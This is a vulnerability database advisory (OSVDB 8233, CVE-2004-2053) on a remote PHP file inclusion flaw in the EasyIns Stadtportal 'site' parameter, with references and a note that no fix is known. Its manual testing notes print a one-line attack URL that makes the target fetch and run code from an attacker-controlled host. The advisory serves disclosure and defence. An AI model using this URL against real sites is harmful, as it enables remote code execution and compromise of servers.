EasyIns Stadtportal index.php Arbitrary Command Execution

2004-07-24T02:56:09
ID OSVDB:8233
Type osvdb
Reporter Francisco Alisson(dominusvis@click21.com.br)
Modified 2004-07-24T02:56:09

Description

Vulnerability Description

Easyins Stadtportal contains a flaw that may allow a malicious user to include and execute arbitrary PHP code. The issue is triggered when an attacker uses a specially formatted URL to include code using the site parameter of index.php. It is possible that the flaw may allow arbitrary code execution resulting in a loss of integrity.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

Easyins Stadtportal contains a flaw that may allow a malicious user to include and execute arbitrary PHP code. The issue is triggered when an attacker uses a specially formatted URL to include code using the site parameter of index.php. It is possible that the flaw may allow arbitrary code execution resulting in a loss of integrity.

Manual Testing Notes

http://[victim]/stadtportal-path/index.php?site=http://[attacker]

References:

Vendor URL: http://www.easyins.de/ Security Tracker: 1010769 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-07/0281.html ISS X-Force ID: 16797 CVE-2004-2053 Bugtraq ID: 10795